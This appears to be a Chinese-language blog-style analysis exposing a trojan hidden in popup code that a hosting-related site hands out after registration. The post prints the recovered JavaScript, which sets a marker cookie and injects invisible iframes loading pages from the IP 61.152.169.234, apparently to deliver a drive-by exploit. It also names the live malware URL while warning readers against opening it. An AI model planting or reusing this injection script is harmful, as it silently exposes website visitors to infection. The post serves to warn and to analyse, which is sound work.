IDC资讯中心
注册后成功获取代码。
上面是获取的代码,开始解剖,
下载下来www.ip686.com/popup.js,
下面是他隐藏的方式,
首先定义了popwin和扩展名JS,
结合上面的说法和上面图片最后一句JS,就形成了,www.ip686.com/popwin.JS这个木马地址,
下载下来这面的用记事本打开,就是这个了,木马露出原形了,
http://61.152.169.234/web.htm这个就是木马地址,请大家不要打开,容易中毒,
<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
var cookieString = document.cookie;
var start = cookieString.indexOf("woshi0day=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 9 * 60 * 60 * 1000);
document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();
document.write("<iframe width=100 height=0 src=’http://61.152.169.234/vip1.htm’></iframe>");
document.write("<iframe width=100 height=0 src=’http://61.152.169.234/vip3.htm’></iframe>");
document.write("<script src=’http://s64.cnzz.com/stat.php?id=522545&web_id=522545′ language=JavaScript charset=gb2312><\/script>");
}</SCRIPT>
还有CNZZ的统计,哈哈
